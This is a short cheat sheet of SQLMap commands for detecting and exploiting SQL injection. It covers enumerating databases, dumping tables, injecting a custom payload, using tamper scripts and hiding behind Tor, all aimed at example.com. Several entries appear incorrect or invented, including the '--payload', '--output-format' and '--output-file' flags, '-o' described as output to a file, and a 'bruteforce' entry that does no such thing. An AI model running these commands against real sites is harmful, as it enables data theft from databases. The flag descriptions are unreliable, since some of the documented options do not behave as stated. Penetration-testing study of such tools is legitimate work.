SQLMap Cheat Sheet

SQLMap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. Below is a SQLMap cheat sheet to help you get started:

Basic Commands

Scan a Website for SQL Injection:

sqlmap -u "http://example.com/page?id=1"

Specify a Parameter for Testing:

sqlmap -u "http://example.com/page" --data="param1=value1&param2=value2"

Load Target URLs from a File:

sqlmap -m targets.txt

Enumeration and Information Gathering

Enumerate Databases:

sqlmap -u "http://example.com/page" --dbs

Enumerate Tables in a Database:

sqlmap -u "http://example.com/page" -D dbname --tables

Enumerate Columns in a Table:

sqlmap -u "http://example.com/page" -D dbname -T tablename --columns

Dump Data from a Table:

sqlmap -u "http://example.com/page" -D dbname -T tablename --dump

Advanced Exploitation

Provide Custom Injection Payload:

sqlmap -u "http://example.com/page" --data="param1=value1" --payload="1' OR '1'='1"

Exploit a Specific SQL Injection Vulnerability:

sqlmap -u "http://example.com/page" --data="param1=value1" -p param1 --dbms=mysql --technique=U

Authentication

Specify Credentials for Login Page:

sqlmap -u "http://example.com/login" --data="username=test&password=test" --cookie="PHPSESSID=abc123"

Bruteforce Login Credentials:

sqlmap -u "http://example.com/login" --data="username=test&password=test" --dbms=mysql --batch --threads=5 --tamper=between,randomcase

Output Options

Save Results to a Text File:

sqlmap -u "http://example.com/page" --data="param1=value1" -o output.txt

Output Results in JSON Format:

sqlmap -u "http://example.com/page" --data="param1=value1" --output-format=json --output-file=output.json

General Options

Specify Proxy for Requests:

sqlmap -u "http://example.com/page" --data="param1=value1" --proxy=http://127.0.0.1:8080

Set Delay Between Requests:

sqlmap -u "http://example.com/page" --data="param1=value1" --delay=5

Enable Tor Anonymity Network:

sqlmap -u "http://example.com/page" --data="param1=value1" --tor

This cheat sheet provides a quick reference for some common SQLMap commands. Always ensure that you have proper authorization to conduct penetration testing and ethical hacking activities. Refer to the official SQLMap documentation for more detailed information and advanced options.